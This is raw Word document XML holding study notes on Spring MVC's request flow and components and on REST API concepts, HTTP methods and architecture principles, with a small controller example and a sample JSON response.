    <w:p w14:paraId="475BEF21" w14:textId="6C299AEE" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Spring MVC?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1AB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Model-View-Controller) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web framework</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by the Spring Framework.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">It’s used to build </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-based web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by separating concerns into </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</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an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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B262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265BC0">
          <v:rect id="_x0000_i1941" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4BE4E"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Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1195790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Here’s how the </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC flow</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E50A7FC"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AC84A">
          <v:rect id="_x0000_i1942" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="674928FD"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Request Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB665D2"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an HTTP Request</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p>
    <w:p w14:paraId="7C6D296A"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quest is intercepted by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Front Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DAB8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 consults the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right </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED7C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The selecte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xml:space="preserve"> method is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D6DE84"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ontroller returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E232A7F"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r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> maps the logical view name to the actual view (e.g., JSP, Thymeleaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36221AFD"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is rendered and returned to the client as an HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55721A79"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029C52">
          <v:rect id="_x0000_i1943" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E8780"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5683"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="01803623" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C50F06C"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ponent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58243E8B"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ole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="009B01A7" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EA995D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ispatcherServlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AE50F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ront Controller — handles all requests &amp; coordinates the flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="419CF5FF" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559B0FE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ntroller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BCE4A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request-handling logic (annotated with @Controller)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="2CF2235C" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D95FF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el</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E85C562"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application data (shared with the View)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="7B2C4FEF" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60434355"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7AF597"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nders the output (JSP, Thymeleaf, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="44537F7A" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E0378D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andlerMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164085A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aps URL to appropriate Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="3C5D615E" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524E4D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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F399B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lves logical view names to actual view files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="656D2318"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33BCAB">
          <v:rect id="_x0000_i1944" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E848A8"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Conceptual Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38380EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A269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6C0C78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atcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3E79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CC7E89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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31C76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CBAEA1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 + View Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B37F5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762950F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Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15348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A8E176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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824D93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8AE8E3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ponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92AF65"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D9E5E2">
          <v:rect id="_x0000_i1945" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F803F"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 of Spring MVC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7C07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oose coupling (MVC separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F44F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nnotations like @Controller, @GetMapping, etc., simplify config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15755FE5"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y integration with REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC9574"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form validation, i18n, exception handling, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E64F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4C905">
          <v:rect id="_x0000_i1946" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E56D04"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73941F3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147FAA3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00B139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hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB343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Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FC7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addAttribute("msg", "Hello, Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8E57A"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welcome"; // Resolved by ViewResolver to welcome.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12182621"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37B8B4B" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="00CE4B95" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B84C6" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="00CE4B95"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47" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDEEE54" w14:textId="5F32460E" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="0096470A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc197867623"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the REST API</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w14:paraId="7302D71A" w14:textId="237C9BC4" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7"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API (Representational State Transfer API)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a set of conventions for building web services that allow clients to interact with resources using standard HTTP methods like </w:t>
      </w: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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02EFCA"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F4B33">
          <v:rect id="_x0000_i1948" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5EF3A"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Key Characteristics of REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A74B8D"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w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each request from a client to the server must contain all the information needed to understand and process the request. The server does not store any session information between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A450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Client-Server Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: REST APIs separate the client and the server, which allows for independent development. The client sends requests and the server responds with resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205F69B"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 REST APIs use a consistent set of conventions for accessing resources (e.g., standard HTTP methods, URIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2577A"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 xml:space="preserve">: Resources (data or services) are identified using </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>URIs (Uniform Resource Identifiers)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A resource can be any object, data, or service that can be accessed via an HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572A704"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 When a client requests a resource, the server sends a representation of that resource (e.g., JSON, XML) as the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E1ED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le</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Responses should explicitly define whether they can be cached for reuse in subsequent requests, improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43711403"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4C191">
          <v:rect id="_x0000_i1949" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="641999FE"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TTP Methods in REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45359C7C"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data from the server (e.g., get a user’s details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C11A83"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add a new user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22E8C8"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update user details).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29492EA7"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a user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778F8904"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728994">
          <v:rect id="_x0000_i1950" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888622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Example of a REST API Request and Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B3EC7"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quest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D141762"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T /users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1E231"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ponse (JSON format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDF6F9A"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52C9663F"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364701B"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D80E5"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email": "john.doe@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB696CC"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AC4067E"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CB8F">
          <v:rect id="_x0000_i1951" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A0FA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REST APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47783C1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ility</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to statelessness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5E278"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paration of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE048F"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xml:space="preserve"> improvements via caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31E28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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using standard HTTP methods and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC2332" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="00CE4B95"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52" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DC3C9" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="00CE4B95" w:rsidRDefault="009376C7" w:rsidP="009376C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="_Toc197867624"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain REST architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w14:paraId="79B71818" w14:textId="230DFF15" w:rsidR="00030141" w:rsidRPr="001B573F" w:rsidRDefault="00030141"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Representational State Transfer) Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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8A013">
          <v:rect id="_x0000_i1953" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D525346"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re Principles of REST Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A515D87"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ness</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7DD5A2"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a client to the server must contain all the information needed to understand and process the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C796B07"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does not store any session information between requests. Every request is independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BAC1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Server Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5EDE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and server are separate entities, allowing for independent development and deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1546B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interacts with the server by sending HTTP requests, and the server responds with data or performs an action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0446EA0C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D82B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defines a set of conventions and constraints for how client and server communicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD3ED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 uniform interface simplifies the architecture and decouples the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC172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mmon conventions include standard HTTP methods (GET, POST, PUT, DELETE) and consistent resource URIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0455B73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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676280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In REST, the main concept is "resource". A resource can be any object, data, or service that can be accessed over the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F57300"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source is identified by a unique URI (e.g., /users, /books/1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49980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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2158F90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a client requests a resource, the server return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usually in JSON or XML format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56C1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presentation includes all the necessary information for the client to interact with the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D5FE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 Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763D9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the client to the server must be self-contained. The server does not store any session information between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA8A8D4"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 the state of the client is stored on the client-side (e.g., cookies, tokens).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61AECD"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ility</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BA39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ponses from the server should explicitly define whether they can be cached by the client or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3FF61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ching helps in improving performance and reducing the need for repeated requests for the same resource.</w:t>
      </w:r>
    </w:p>
